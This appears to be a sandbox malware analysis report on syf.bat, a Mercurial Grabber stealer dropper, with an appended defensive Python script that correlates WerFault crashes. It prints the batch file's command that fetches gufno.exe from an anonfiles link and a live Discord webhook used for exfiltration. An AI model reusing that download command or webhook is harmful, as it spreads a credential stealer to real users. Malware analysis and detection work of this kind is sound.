Analysis
max time kernel: 416s
max time network: 401s
platform: windows10-2004_x64
resource: win10v2004-20230621-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230621-en, locale:en-us, os:windows10-2004-x64, system
submitted: 30-06-2023 00:46
Static task: static1
Behavioral task: behavioral1
Sample: syf.bat
Resource: win10v2004-20230621-en
General
Target: syf.bat
Size: 66B
MD5: e0826630cae6cb850d279f15f341e64d
SHA1: b49dd815cb1f2dfa6023b66930c407be37c272d3
SHA256: 200f7d7d6ff1e2907a344c5bd4a07435479fc83a71f8c82887995f23a2e1de6d
SHA512: fda98de97d58de7b1c3fc2f7d0d5b26acd40aac7f7f151b54f3c72d3cae82f60779402616966e88805b15b2601e9437e57898f2e183b561153b42137c96113fb
Malware Config
Extracted
Family: mercurialgrabber
Webhook URL: https://discord.com/api/webhooks/1123613383334297702/ygbkzaoZsN7geZf0_Godm64atMjwGcn6nKS0E9XU_sdFhCer22GARIslt7tIgwaVFzoY
Signatures

Mercurial Grabber Stealer
Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.

Downloads MZ/PE file

Executes dropped EXE (3 IoCs)
  pid | process
  5688 | gufno.exe
  2404 | gufno.exe
  1004 | gufno.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Adds Run key to start application (2 TTPs, 1 IoC)
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Software\Microsoft\Windows\CurrentVersion\Run | chrome.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP)

Looks up external IP address via web service (7 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  168 | ip4.seeip.org
  179 | ip-api.com
  186 | ip4.seeip.org
  134 | ip4.seeip.org
  135 | ip4.seeip.org
  136 | ip4.seeip.org
  138 | ip-api.com

Drops file in Program Files directory (2 IoCs)
  description | ioc | process
  File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\495727d1-d67f-44d9-9300-3673d462ef3e.tmp | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230630004648.pma | setup.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Program crash (3 IoCs)
  pid | pid_target | process | target process
  1168 | 5688 | WerFault.exe | gufno.exe
  5932 | 2404 | WerFault.exe | gufno.exe
  5028 | 1004 | WerFault.exe | gufno.exe

Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | gufno.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | gufno.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | gufno.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | gufno.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | gufno.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | gufno.exe

Enumerates system info in registry (2 TTPs, 6 IoCs)
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe

Modifies data under HKEY_USERS (2 IoCs)
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
  Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133325597135138274" | chrome.exe

Modifies registry class (2 IoCs)
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe
  Key created | \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000_Classes\Local Settings | msedge.exe

NTFS ADS (1 IoC)
  description | ioc | process
  File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 609453.crdownload:SmartScreen | msedge.exe
Suspicious behavior: EnumeratesProcesses (10 IoCs)
  pid | process
  3268 | msedge.exe
  3268 | msedge.exe
  1520 | msedge.exe
  1520 | msedge.exe
  2360 | identity_helper.exe
  2360 | identity_helper.exe
  5332 | msedge.exe
  5332 | msedge.exe
  5476 | chrome.exe
  5476 | chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (15 IoCs)
  pid | process | rows
  1520 | msedge.exe | 10
  5476 | chrome.exe | 5

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description | pid | process | rows
  Token: SeDebugPrivilege | 5688 | gufno.exe | 1
  Token: SeDebugPrivilege | 2404 | gufno.exe | 1
  Token: SeDebugPrivilege | 1004 | gufno.exe | 1
  Token: SeShutdownPrivilege | 5476 | chrome.exe | 31
  Token: SeCreatePagefilePrivilege | 5476 | chrome.exe | 30
  (the chrome.exe rows alternate SeShutdownPrivilege / SeCreatePagefilePrivilege in the original listing)

Suspicious use of FindShellTrayWindow (39 IoCs)
  pid | process | rows
  1520 | msedge.exe | 12
  5476 | chrome.exe | 27

Suspicious use of SendNotifyMessage (24 IoCs)
  pid | process | rows
  5476 | chrome.exe | 24

Suspicious use of WriteProcessMemory (64 IoCs)
  description | pid | process | target process | rows
  PID 4436 wrote to memory of 1520 | 4436 | cmd.exe | msedge.exe | 2
  PID 1520 wrote to memory of 3448 | 1520 | msedge.exe | msedge.exe | 2
  PID 1520 wrote to memory of 1356 | 1520 | msedge.exe | msedge.exe | repeated
  PID 1520 wrote to memory of 3268 | 1520 | msedge.exe | msedge.exe | 2
  PID 1520 wrote to memory of 3560 | 1520 | msedge.exe | msedge.exe | repeated
  (the rows for targets 1356 and 3560 together account for the remaining 58 of the 64 entries)
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\syf.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://anonfiles.com/0fB4u5zfz1/gufno_exe2⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7fff337e46f8,0x7fff337e4708,0x7fff337e47183⤵PID:3448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:23⤵PID:1356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:3268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2988 /prefetch:83⤵PID:3560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:13⤵PID:1076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:13⤵PID:1240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:13⤵PID:1884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5928 /prefetch:83⤵PID:764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
PID:4256 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff793b75460,0x7ff793b75470,0x7ff793b754804⤵PID:5056
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5928 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:2360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:13⤵PID:2676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3796 /prefetch:13⤵PID:4472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:13⤵PID:3364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:13⤵PID:4536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:13⤵PID:4992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5348 /prefetch:83⤵PID:3828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:13⤵PID:4360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6372 /prefetch:13⤵PID:3500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6712 /prefetch:83⤵PID:5144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,5781105263122221039,4927277992985010101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3716 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:5332
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1368
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5528
-
C:\Users\Admin\Downloads\gufno.exe"C:\Users\Admin\Downloads\gufno.exe"1⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:5688 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5688 -s 21522⤵
- Program crash
PID:1168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5476 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff35369758,0x7fff35369768,0x7fff353697782⤵PID:5624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1824 --field-trial-handle=1844,i,1441530613839141600,7814641162756100827,131072 /prefetch:22⤵PID:1932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1844,i,1441530613839141600,7814641162756100827,131072 /prefetch:82⤵PID:4984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1444 --field-trial-handle=1844,i,1441530613839141600,7814641162756100827,131072 /prefetch:82⤵PID:5848
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3248 --field-trial-handle=1844,i,1441530613839141600,7814641162756100827,131072 /prefetch:12⤵PID:2496
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3380 --field-trial-handle=1844,i,1441530613839141600,7814641162756100827,131072 /prefetch:12⤵PID:5888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4536 --field-trial-handle=1844,i,1441530613839141600,7814641162756100827,131072 /prefetch:12⤵PID:6028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4700 --field-trial-handle=1844,i,1441530613839141600,7814641162756100827,131072 /prefetch:82⤵PID:5992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4832 --field-trial-handle=1844,i,1441530613839141600,7814641162756100827,131072 /prefetch:82⤵PID:6000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4964 --field-trial-handle=1844,i,1441530613839141600,7814641162756100827,131072 /prefetch:82⤵PID:1280
-
-
  C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 628)
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5136 --field-trial-handle=1844,i,1441530613839141600,7814641162756100827,131072 /prefetch:8

  C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 4500)
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 --field-trial-handle=1844,i,1441530613839141600,7814641162756100827,131072 /prefetch:8

  C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 6012)
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5272 --field-trial-handle=1844,i,1441530613839141600,7814641162756100827,131072 /prefetch:1

  C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 6032)
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5324 --field-trial-handle=1844,i,1441530613839141600,7814641162756100827,131072 /prefetch:1

  C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 3984)
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4936 --field-trial-handle=1844,i,1441530613839141600,7814641162756100827,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe  (PID 3032)
  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Users\Admin\Downloads\gufno.exe  (PID 2404)
  "C:\Users\Admin\Downloads\gufno.exe"
  - Executes dropped EXE
  - Checks processor information in registry
  - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\WerFault.exe  (PID 5932)
    C:\Windows\system32\WerFault.exe -u -p 2404 -s 2080
    - Program crash

C:\Users\Admin\Downloads\gufno.exe  (PID 1004)
  "C:\Users\Admin\Downloads\gufno.exe"
  - Executes dropped EXE
  - Checks processor information in registry
  - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\WerFault.exe  (PID 5028)
    C:\Windows\system32\WerFault.exe -u -p 1004 -s 2140
    - Program crash

C:\Windows\system32\WerFault.exe  (PID 5864)
  C:\Windows\system32\WerFault.exe -pss -s 424 -p 5688 -ip 5688

C:\Windows\system32\WerFault.exe  (PID 2496)
  C:\Windows\system32\WerFault.exe -pss -s 488 -p 2404 -ip 2404

C:\Windows\system32\WerFault.exe  (PID 640)
  C:\Windows\system32\WerFault.exe -pss -s 520 -p 1004 -ip 1004
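The process tree above shows each launch of gufno.exe from the Downloads folder followed by a WerFault.exe child that names the crashed PID on its command line. The following is an added example, not part of the sandbox report and not Mercurial Grabber or sandbox-vendor code: a correlation routine that runs over process-creation events constructed to mirror the tree (the field names pid/image/cmdline are assumed, loosely modelled on Sysmon Event ID 1), extracts the faulting PID from both WerFault command-line shapes visible in the tree, joins it to the creation event for that PID, and flags crashes of executables launched from a user's Downloads folder. The creation event for PID 5688 is deliberately left out of the sample to show how a WerFault that references an unknown PID is reported.

```python
"""Correlate WerFault.exe launches back to the process that crashed.

Added example, not part of the sandbox report. Field names (pid, image,
cmdline) are assumed; the sample events below are constructed from the
report's process tree, not captured log output.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Both WerFault command-line shapes seen in the report's process tree.
WERFAULT_USER = re.compile(r"\s-u\s+-p\s+(\d+)\s+-s\s+\d+\b", re.I)
WERFAULT_PSS = re.compile(r"\s-pss\s+-s\s+\d+\s+-p\s+(\d+)\s+-ip\s+(\d+)\b", re.I)
# "Dropped executable" heuristic: image path under any user's Downloads folder.
DOWNLOADS_RE = re.compile(r"^[a-z]:\\users\\[^\\]+\\downloads\\", re.I)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str


# Constructed sample events. The creation event for PID 5688 is deliberately
# absent so the unknown-PID path is exercised.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(2404, r"C:\Users\Admin\Downloads\gufno.exe", r'"C:\Users\Admin\Downloads\gufno.exe"'),
    ProcEvent(1004, r"C:\Users\Admin\Downloads\gufno.exe", r'"C:\Users\Admin\Downloads\gufno.exe"'),
    ProcEvent(3032, r"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe",
              r'"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"'),
    ProcEvent(5932, r"C:\Windows\system32\WerFault.exe", r"C:\Windows\system32\WerFault.exe -u -p 2404 -s 2080"),
    ProcEvent(5028, r"C:\Windows\system32\WerFault.exe", r"C:\Windows\system32\WerFault.exe -u -p 1004 -s 2140"),
    ProcEvent(5864, r"C:\Windows\system32\WerFault.exe", r"C:\Windows\system32\WerFault.exe -pss -s 424 -p 5688 -ip 5688"),
    ProcEvent(2496, r"C:\Windows\system32\WerFault.exe", r"C:\Windows\system32\WerFault.exe -pss -s 488 -p 2404 -ip 2404"),
    ProcEvent(640, r"C:\Windows\system32\WerFault.exe", r"C:\Windows\system32\WerFault.exe -pss -s 520 -p 1004 -ip 1004"),
]


def is_werfault(ev: ProcEvent) -> bool:
    return ev.image.lower().endswith(r"\werfault.exe")


def crashed_pid(cmdline: str) -> Optional[int]:
    """PID of the faulting process named on a WerFault command line, or None."""
    m = WERFAULT_USER.search(cmdline) or WERFAULT_PSS.search(cmdline)
    return int(m.group(1)) if m else None


def correlate(events: List[ProcEvent]) -> List[Dict[str, object]]:
    """One record per WerFault launch: the crashed PID, the image it resolves
    to (None when no creation event was seen, e.g. a log gap or PID reuse),
    and whether that image lives under a user's Downloads folder."""
    by_pid: Dict[int, ProcEvent] = {ev.pid: ev for ev in events}
    records: List[Dict[str, object]] = []
    for ev in events:
        if not is_werfault(ev):
            continue
        target = crashed_pid(ev.cmdline)
        crashed = by_pid.get(target) if target is not None else None
        records.append({
            "werfault_pid": ev.pid,
            "crashed_pid": target,
            "crashed_image": crashed.image if crashed else None,
            "from_downloads": bool(crashed and DOWNLOADS_RE.match(crashed.image)),
        })
    return records


def crashed_downloads_pids(events: List[ProcEvent]) -> List[int]:
    """Distinct PIDs of Downloads-launched executables that WerFault reported on."""
    return sorted({r["crashed_pid"] for r in correlate(events) if r["from_downloads"]})


if __name__ == "__main__":
    for record in correlate(SAMPLE_EVENTS):
        print(record)
    print("dropped executables that crashed:", crashed_downloads_pids(SAMPLE_EVENTS))
```

Both WerFault shapes carry the faulting PID in the `-p` argument; the `-pss` form repeats it as `-ip`. Joining on the creation event rather than trusting the path embedded in the WerFault line is what lets the routine tell a crash of a dropped executable apart from a crash of a signed browser component with the same PID reused later.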
Network
